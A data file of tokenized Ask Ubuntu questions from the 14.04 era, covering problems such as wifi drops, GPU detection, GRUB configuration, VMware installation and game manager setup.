461849	bad wifi connection with lenovo x240 under ubuntu 14.04 -- - intel wireless 7260	on my lenovo x240 i have installed ubuntu 14.04 . everything , including the lan connection , works very smoothly except from the wifi . the computer connects to a wifi hotspot but after a few bytes transmitted the connection breaks down completely . edit : -- > if the hotspot is less crowded , i.e . if i switch off my other clients , then the connection works more or less stable but still with occasional troubles . < -- the hotspot is ok , since other devices do not experience any troubles . any ideas ? i am not too deep in ubuntu , please give me advice if you need more information on the hardware . this is what iwconfig gives me : iland @ note121 : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' thrasher ( at ) hajod.de '' mode : managed frequency:2.412 ghz access point : 7c:4f : b5 : c8 : d2 : c4 bit rate=54 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=70/70 signal level=-35 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:6 missed beacon:0 and this what sudo lhsw -c network gives : *-network description : ethernet interface product : ethernet connection i218-lm vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : 28 : d2:44:40:96:64 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=0.6-3 ip=192.168.1.11 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:61 memory : f0600000-f061ffff memory : f063e000-f063efff ioport:3080 ( size=32 ) *-network description : wireless interface product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 83 serial : 5c:51:4f:58 : a5 : c5 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=22.24.8.0 ip=192.168.1.10 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:66 memory : f0400000-f0401fff
461856	ubuntu 14.04 does not indicate my discrete gpu	after installing bumblebee and nvidia 331.38 driver with primus i get this error delmomd @ dell : ~ $ optirun steam [ 887.242992 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 887.243047 ] [ error ] could not connect to bumblebee daemon - is it running ? after searching for solution on the internet i 've found out that ubuntu does not detect my nvidia card . i have n't found any way to turn on optimus in bios . any ideas how i can detect my gpu and use bumblebee again ? funny thing is that i had this problem on steamos too , that 's why i 've returned to ubuntu . my laptop : dell inspiron 7720 , gpu : nvidia geforce 650m edit : that 's one of the ways i 've discovered that ubuntu does not detect my card : delmomd @ dell : ~ $ sudo bumblebeed restart [ sudo ] password for delmomd : [ 649.003957 ] [ error ] no discrete video card found , quitting
461857	does the epiphany browser have desktop notifications ?	does the web browser epiphany have desktop notifications ? how i can activate them ? thanks and best regards .
461858	error in partition	i have upgraded to ubuntu desktop 14.04 as 2nd upgrade . after upgrading it ask me to restart after restarting there is an error in disk partition & i cant load any page i using dual operationg system windows & ubuntu but windows operating system is working correctly please give me a solution
461860	problem with fonts on kubuntu 14.04 and ff29	yesterday i updated my machine to kubuntu 14.04 and firefox to version 29 . now , i have an issue with some fonts , specially on rendering inputs . the font is noticeable bolder and bigger than before , and also , bolder and bigger than on opera on the same machine . below you can see an example of a webpage opened on ff 29 and opera 12.16 on my computer . this used to work before updating to 14.04 . i mean , they looked exactly the same . so i think something broke on the font size of things . any idea ? before someone forgets . no addons running on ff , no zoom either . there are also no vendor specific settings here . i opened it on a friends computer running ff29 under gnome ( arch linux fully updated ) and it worked like it should , so the problem is on ff on kde . for the page , the font-family : helvetica , arial , sans-serif , the font settings on kde can be seen on the last image . as i said , only thing that changed was doing the full release upgrade . any ideas ?
461861	how to create shortcuts using the terminal	i know the easy way using the unity but is there a way to make a shortcut for chrome for example using the terminal .
461863	how to completely remove xubuntu login page ?	i have unity installed and later i installed xubuntu ; now i removed xubuntu and switched back to unity . however , every time i log in , the there will be first the unity login page and after logged in , it will then jump to the xubuntu login page . so everytime i need is to tape twice my password . how can i fix this ? i tried with unity-tweak-tool -- reset-unity command , but it does n't work . # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=hidden set timeout=0 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- interruptible 0 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.11.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-19-generic-advanced-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.11.0-19-generic ... ' linux /boot/vmlinuz-3.11.0-19-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-19-generic } menuentry 'ubuntu , with linux 3.11.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-19-generic-recovery-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.11.0-19-generic ... ' linux /boot/vmlinuz-3.11.0-19-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-19-generic } menuentry 'ubuntu , with linux 3.11.0-14-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-14-generic-advanced-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.11.0-14-generic ... ' linux /boot/vmlinuz-3.11.0-14-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-14-generic } menuentry 'ubuntu , with linux 3.11.0-14-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-14-generic-recovery-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.11.0-14-generic ... ' linux /boot/vmlinuz-3.11.0-14-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-14-generic } menuentry 'ubuntu , with linux 3.11.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-advanced-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } menuentry 'ubuntu , with linux 3.11.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-recovery-86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=86a4e1a4-02f7-45b8-91be-738e6c8a08f1 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 else search -- no-floppy -- fs-uuid -- set=root 86a4e1a4-02f7-45b8-91be-738e6c8a08f1 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # ( ps : before i installed xubuntu , i modified the login theme to one of the login themes that comes with ubuntu unity )
461864	transparent window title bars 14.04lts	i ca n't figure out how to get transparent window title bars in 14.04 have tried dconfig editor which has no effect ( worked on previous versions ) any suggestions or step-by-steps massively appreciated . d
461865	upower reports incorrect capacity	i 've just replaced my old netbook battery with a new one of higher capacity . it was a cheap battery off of amazon which clearly reads as a 5200mah battery but ubuntu reports the battery as being the standard 4400mah battery that came with the system and that it has 99 % of its capacity left . this seems very strange but i have no idea how to directly confirm the capacity . i 've installed acpi and run : acpi -v the returns the same information as upower interface . i 've run : sudo fwts battery and the system reports the battery is fine for a new battery , though it does report a lack of acpi events . is there any way to manually set the capacity ( i have to do this with my android phone and the battery monitoring app i use ) or force it so rescan the battery ?
461867	not able to connect to the internet using huawei e303 datacard	i followed the steps mentioned in the post . but now i am not able to connect to the internet using my huawei e303 datacard . i am using ubuntu 14.04 lts . could you please guide me on this ?
461870	accidently wiped my windows 8 os while installing ubuntu	earlier today i was installing ubuntu 14.04 lts on my laptop . i had done this a couple of weeks ago alongside my windows 8 os but it seemed to have encountered an error and would n't load . i then re-installed ubuntu , at which time a message appeared telling me that ubuntu was already on my laptop and asked if i want to delete it and install again . upon doing so , it wiped my entire computer including windows 8 . deeply pissed with my situation i am seeking help from someone who is able to perform miracles and get my windows 8 os back fully intact with all of my files . please someone tell me this is possible ?
461872	ubuntu 14.04 freezes after wake up	after wake up the login screen appears , but i can not type the password to log in . furthermore , the buttons on the system panel ( e. g. to shut down ) are disabled , so clicking does not take effect . i 'm using samsung rv509 , 64 bit .
461873	can ubuntu be installed on sony xperia ion android phone ?	i want to have ubuntu alongside android on my android phone , but i do n't want to loose any files and media i already currently have on my device . please help ! ! ! ! !
461875	which file ( or code ) actually control the monitor 's brightness in `` gnome-control-center '' ?	at first , i tried to simulate fn + f5 / f6 in order to control the monitor 's brightness , but i totally failed . so , i started to find out workarounds : there is a built-in software called gnome-control-center , so i tried to find out the solution from it . we can see that there is a bar controlling monitor 's brightness . drag to the left for darkening , and vice versa . i 've downloaded the source code for 12.04 [ site ] , but i still could n't find the code snippet which controls the monitor 's brightness . could anyone help me ? thanks .
461876	mouse wheel issue	i have a dual operating system on my dell inspiron 3647 . when i 'm on the windows side , my mouse wheel works the way i have always known a mouse-wheel to work - when one is moving the mouse wheel towards you when on a website , on a `` word '' document , or even on the ubuntu guide when on the ubuntu side , the information on the lower part of the page appears , and the earlier information is further `` up '' the page . however , when i 'm on the ubuntu side and am just checking out any website , or document , or even here on this ubuntu help page , the mouse wheel works in reverse - i have to move the mouse wheel up , away from me , when i want to see lower down the page . how do i fix this set-up so when i move the mouse wheel towards me , i see further down any website , or document ? the mouse-wheel action on other computers that i 've had with this dual-operating system has n't displayed any problem like this . i can move the mouse wheel towards me , and it `` moves '' down the website , document , guide , etc . i 've worked on ubuntu for a few years now , thanks to my wonderful ubuntu computer techies 1/2 hour away from me here in massachusetts , but i decided that it 's also a good time for me to connect with the ubuntu community - i am not techie savvy , and need the simplest , easiest response for my mouse issue , or any issue i might bring up here . thanks ! ! donna
461877	how to install graphical environment to work simultaneously with ubuntu 12.04 server	i have a machine running ubuntu 12.04 ( only console as this is supposed to be my server ) and now i also want to add a graphical environment on this machine . more details : i want the main os to be the : ubuntu 12.04 console as it is now and by typing commands on this console to open a graphical environment ( i prefer ubuntu 12.04 desktop ) in order to access the internet more easily without having to search from another pc i was thinking of installing a virtual machine from my ubuntu console and then installing ubuntu desktop on this virtual machine . can anyone please tell me if this is feasible and how can be done ?
461880	what can i do for spotify linux preview that always goes out of monitor with lubuntu ?	i have had issue with spotify for a long time on lubuntu . it occasionally goes out of my monitor and i have only one monitor . i can only see the lower right corner and i can not even move the window to sane position where i could use it . i also have issue with steam having ghosts and needing to move other windows above that `` ghost '' , but it 's probably unrelated . i am on lubuntu 14.04 , this has happened even with older releases . i have tried googling many times , earlier today i asked at finnish ubuntu channel and then the main lubuntu channel at freenode and then i thought that i could ask here too . oh , and running spotify under wine does n't look like an opinion for me , because wined spotify wants to use 500 % cpu .
461881	multiple problems while installing vmware player with kernel headers	sorry , pretty long problem first some background : i was running ubuntu 13.10 x64 in my laptop . i just upgraded to 14.04 few weeks back . the output of the uname -a currently on my system are linux ubuntu 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux now , i downloaded the vmware-player-6.0.2-1744117.x86_64.bundle and tried to install it on my laptop running ubuntu 14.04 x64 . i installed vmware-player bundle usual way via sudo sh vmware-player-6.0.2-1744117.x86_64.bundle after that , i tried to run the vmware player by searching through the search dock and clicking on its icon . i get this window i googled the problem and found many people had faced such similar problem but with many different solutions . unfortunately , none worked for me . one was to install the header via this command sudo apt-get install build-essential linux-headers- $ ( uname -r ) i tried it and got the following output reading package lists ... done building dependency tree reading state information ... done package linux-headers-3.11.0-19-generic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'linux-headers-3.11.0-19-generic ' has no installation candidate this was scary . then i tried to another solution sudo vmware-modconfig -- console -- install-all again for no luck . failed to setup build environment . then i tried this solution i was totally confused then because the terminal showed , the path /lib/modules/ $ ( uname -r ) /build/include/linux i.e . /lib/modules/3.11.0-19-generic/build/include/linux did n't exists ! then i executed the following commands to clear my doubt : $ cd /lib/modules $ : /lib/modules $ ls 3.11.0-19-generic 3.13.0-24-generic $ : /lib/modules $ ls 3.11.0-19-generic 3.13.0-24-generic 3.11.0-19-generic : initrd modules.alias modules.builtin modules.dep modules.devname modules.softdep modules.symbols.bin kernel modules.alias.bin modules.builtin.bin modules.dep.bin modules.order modules.symbols updates 3.13.0-24-generic : build i am totally confused about whats wrong with my system and what should i do now ? thanks !
461882	ca n't play .mp4 files embedded in html5 player in firefox	i have just installed lubuntu 14.04 . i can run .mp4 video files directly with firefox but if i put them into an html5 tag then i get error : 'video format or mime type is not supported ' . i have been searching for a solution to this for hours now , i 've tried so much but to no avail . i am using firefox version 28.0 . os : lubuntu 14.04 and i have : installed flashplugin-installer . set media.gstreamer.enabled to false in about : config . changed the .htaccess file to include : addtype video/mp4 mp4 m4v f4v f4p addtype video/ogg ogv addtype video/webm webm addtype video/x-flv flv and i have also done : sudo add-apt-repository ppa : mc3man/trusty-media sudo apt-get update sudo apt-get install gstreamer0.10-ffmpeg according to : 10 things to do after installing ubuntu 14.04 trusty tahr to get a near perfect desktop then i installed lubuntu extras , as is detailed here , but its all to no avail and the error just persists . does anybody know how i can get to view html5 embedded .mp4 files in firefox ?
461884	renesas usb3.0 pci-e card not detected	i ca n't see this pci-e card inside ubuntu 14.04 - and its original cd comes with windows driver only : renesas-usb3-host-driver-30120-setup.exe anyway to make this card working in ubuntu ?
461885	problems installing or upgrading 13.10 to 14.04 32 bits	when i install ubuntu 14.04 or upgrade 13.10 to 14.04 the screen shows multicolour segments in horizontal strips . now i continue to use a version 13.10 that in my computer is perfect . my motherboard is old , asus p5vd2-x and has 1 mb of ram memory . had anybody already that problem ? and what is the solution ? ?
461888	run a command on shutdown ?	i recently installed grive , a third party google drive tool for ubuntu , and in order to sync the folders , you must run the command grive in the google drive folder in your home page . is there a way i can automate a simple command before my system shuts down to ensure i always sync my libraries ? thanks !
461892	conexant cx11235 modem card not detected in ubuntu 14.04	i can use this modem card inside windows 7 but it was not detected in ubuntu 14.04 . anyway to make it working ?
461895	upgrade from 12.04 to 14.04 from a terminal	how do i upgrade to 14.04 around my existing system with out re-installing ? i have ubuntu 12.04 lts x64 currently . i have checked through update manager . is there a way to do it through terminal ?
461896	wbat does it mean , by this question	i am attempting to get into synaptic package manager , and it is now saying : you must manually instruct : dpkg-configure-a how do i do this ? regards , thomas
461897	can ubuntu be installed on samsung galaxy s advance i9070 with android 4.1.2	i have galaxy s advance i9070 phone . i want to use ubuntu on the device . is there any ubuntu image available for galaxy s advance i9070 and can it be installed with android as dual boot ?
461899	djl game manager installation problems	i 'm trying to get djl ( game manager ) from : http : //en.djl-linux.org/ ? q=node/19 after getting the pakage , i followed the instructions for installation from : http : //www.unixmen.com/install-more-then-100-games-in-one-command/ i used the command tar -zxvf djl-1.2.14.tar.gz . and the output came out as : dell @ dell-inspiron-1420 : ~ $ tar -zxvf djl-1.2.14.tar.gz tar ( child ) : djl-1.2.20.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now then i used this command : tar -zxvf ~/downloads/djl-1.2.20.tar.gz but i get this : dell @ dell-inspiron-1420 : ~ $ tar -zxvf ~/downloads/djl-1.2.20.tar.gz djl/ djl/djl.sh djl/djl/ djl/djl/journal.txt djl/djl/.eric4project/ djl/djl/.eric4project/project-apis.db djl/djl/res/ djl/djl/res/b_oxygen.png djl/djl/res/transp.png djl/djl/res/quitter.png djl/djl/res/modules_oxygen.png djl/djl/res/winehq.png djl/djl/res/configuration.png djl/djl/res/txt_oxygen.png djl/djl/res/irc_crystal.png djl/djl/res/importer.png djl/djl/res/echange_ui_oxygen.png djl/djl/res/redemarre_oxygen.png djl/djl/res/msg_oxygen.png djl/djl/res/ajouter.png djl/djl/res/maj_oxygen.png djl/djl/res/configure_oxygen.png djl/djl/res/a_propos.png djl/djl/res/jeux_oxygen.png djl/djl/res/actus.png djl/djl/res/supprimer_oxygen.png djl/djl/res/arg_oxygen.png djl/djl/res/telech1.png djl/djl/res/drapeaux/ djl/djl/res/drapeaux/italy.png djl/djl/res/drapeaux/sweden.png djl/djl/res/drapeaux/poland.png djl/djl/res/drapeaux/espagne.png djl/djl/res/drapeaux/france.png djl/djl/res/drapeaux/galicia.png djl/djl/res/drapeaux/portugal.png djl/djl/res/drapeaux/hu.png djl/djl/res/drapeaux/de.png djl/djl/res/drapeaux/ru.png djl/djl/res/drapeaux/en.png djl/djl/res/information.png djl/djl/res/retirer.png djl/djl/res/maj.png djl/djl/res/locale_oxygen.png djl/djl/res/recherche_oxygen.png djl/djl/res/irc_crystal_mp.png djl/djl/gdep.py djl/djl/djl_main.py djl/djl/irc.py djl/djl/variables.py djl/djl/config.py djl/djl/diff.py djl/djl/libs/ djl/djl/libs/soappy/ djl/djl/libs/soappy/soapbuilder.py djl/djl/libs/soappy/wstools/ djl/djl/libs/soappy/wstools/wsdltools.py djl/djl/libs/soappy/wstools/c14n.py djl/djl/libs/soappy/wstools/test/ djl/djl/libs/soappy/wstools/test/test_wstools.py djl/djl/libs/soappy/wstools/test/test_wsdl.py djl/djl/libs/soappy/wstools/test/__init__.py djl/djl/libs/soappy/wstools/test/test_t1.py djl/djl/libs/soappy/wstools/test/test_wstools_net.py djl/djl/libs/soappy/wstools/__init__.py djl/djl/libs/soappy/wstools/xmlschema.py djl/djl/libs/soappy/wstools/xmlname.py djl/djl/libs/soappy/wstools/utility.py djl/djl/libs/soappy/wstools/timeoutsocket.py djl/djl/libs/soappy/wstools/namespaces.py djl/djl/libs/soappy/wstools/logging.py djl/djl/libs/soappy/wstools/usertuple.py djl/djl/libs/soappy/server.py djl/djl/libs/soappy/changelog djl/djl/libs/soappy/license djl/djl/libs/soappy/client.py djl/djl/libs/soappy/version.py djl/djl/libs/soappy/__init__.py djl/djl/libs/soappy/fpconst/ djl/djl/libs/soappy/fpconst/__init__.py djl/djl/libs/soappy/parser.py djl/djl/libs/soappy/types.py djl/djl/libs/soappy/soap.py djl/djl/libs/soappy/urlopener.py djl/djl/libs/soappy/utilities.py djl/djl/libs/soappy/ns.py djl/djl/libs/soappy/readme djl/djl/libs/soappy/wsdl.py djl/djl/libs/soappy/config.py djl/djl/libs/soappy/gsiserver.py djl/djl/libs/soappy/errors.py djl/djl/libs/feedparser/ djl/djl/libs/feedparser/__init__.py djl/djl/libs/irclib/ djl/djl/libs/irclib/__init__.py djl/djl/libs/fopen.py djl/djl/libs/test_ws.py djl/djl/rss.py djl/djl/djl.py djl/djl/configuration.py djl/djl/installe.py 